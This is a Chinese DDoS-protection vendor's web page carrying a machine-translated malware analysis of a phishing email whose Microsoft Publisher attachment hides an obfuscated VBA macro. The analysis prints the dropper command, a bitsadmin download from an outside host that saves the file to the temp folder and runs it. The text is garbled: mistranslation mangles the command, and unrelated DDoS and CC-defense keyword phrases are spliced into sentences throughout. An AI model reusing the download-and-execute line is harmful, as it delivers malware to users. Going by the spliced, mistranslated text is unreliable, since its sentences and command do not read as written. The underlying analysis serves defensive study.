DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

ddos防攻击_苍云盾立_优惠券

01-12 WEB安全

ddos防攻击_苍云盾立_优惠券

我们已经开始看到恶意软件作者在许多非常规文件类型中使用嵌入式visualbasic(VBA)宏来攻击主机。Microsoft Ray Analyzer现在支持Microsoft Ray Analyzer对VM2.0文件的响应。对新样本类型分析的支持意味着攻击面的覆盖范围更广,这反过来又意味着更大的检测能力。在这篇文章中,ddos防御结果,我们回顾了与来自service@paypal.com。所附文件(如图1所示)伪装成付款收据,标题为"FD-酒馆".图1:带有恶意MS Publisher附件的电子邮件分析我们首先将电子邮件附件拖放到VMRay云中,在那里它会立即被识别为"Microsoft Publisher文档"。在完成分析后,VMRay Analyzer将一个严重性标签"恶意"分配给示例(图2)。图2:显示样本类型和严重性的"样本视图"屏幕概览显示了一个不寻常的流程树(请参见图3)。通常是Microsoft Publisher应用程序(mspub.exe文件)打开文档,cc攻击防御方案,它是唯一关联的进程。但是,在这种情况下,会调用其他几个进程。异常过程:图3打开文档后,bp神经网络怎么防御ddos攻击,执行以下命令:命令行.exe/c bitsadmin/传输我的作业/下载/优先前景"hxxp://www.doorasope.top/read.php?f=1.gif英寸%温度%\勒特西.jpg">nul&"%temp%\勒特西.jpg""退出(&E)此命令被隐藏并作为VBA宏嵌入到Publisher文档中,该宏非常模糊,通常很难提取。图4显示了在打开文档时触发函数"Document_Open()"的宏。图4:示例中嵌入的高度模糊的VBA宏由于VMRay Analyzer监视每个进程,所以我们可以提取并查看打开文档后执行的命令(图5)。微软的bitsadmin工具用于下载文件,将其复制到Windows临时文件夹中,然后执行。下载的文件可以是特洛伊木马或勒索软件或恶意软件作者希望在攻击中使用的任何其他恶意文件。在此分析中,下载的文件很可能是首先连接到多个C&C(命令和控制服务器)的特洛伊木马/Bot。图5:显示示例文件到远程主机的连接的网络视图结论对恶意软件作者来说,选择Microsoft Publisher文件格式可能不是最受欢迎的,但它表明,没有任何文件格式可以被认为是安全的且没有恶意内容。恶意软件检测和分析解决方案需要通过支持这些样本类型来确保它们提供更大的攻击面覆盖范围。在这个分析中,VTI分数(如图6所示)表明Publisher文档执行visualbasic,创建进程并将文件放到系统中,所有这些都构成可疑行为。图6:VTI得分恶意软件作者使用几种方法来尝试和逃避检测和分析系统。使用鲜为人知或不常使用的文件类型就是这样一种技术。然而,VMRay的研究团队已经准备好应对这些规避技术。关于Ralf HundRalf博士于2013年在波鸿鲁尔大学获得计算机科学/信息技术安全博士学位。在他的研究期间,他专注于软件二进制文件的新分析方法,特别是恶意软件。他的研究成果发表在许多领先的学术IT安全会议上,并因杰出的工作而获得多个奖项。此外,防御cc最好的办法,拉尔夫还参与了一些沙盒技术的设计和开发。他在恶意软件研究方面拥有超过10年的经验,并在各种学术和工业会议上积极发言。他的特殊兴趣在于虚拟化技术及其在软件分析中的应用。

,ccddos完美防御

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /web/61242.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 8164087访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X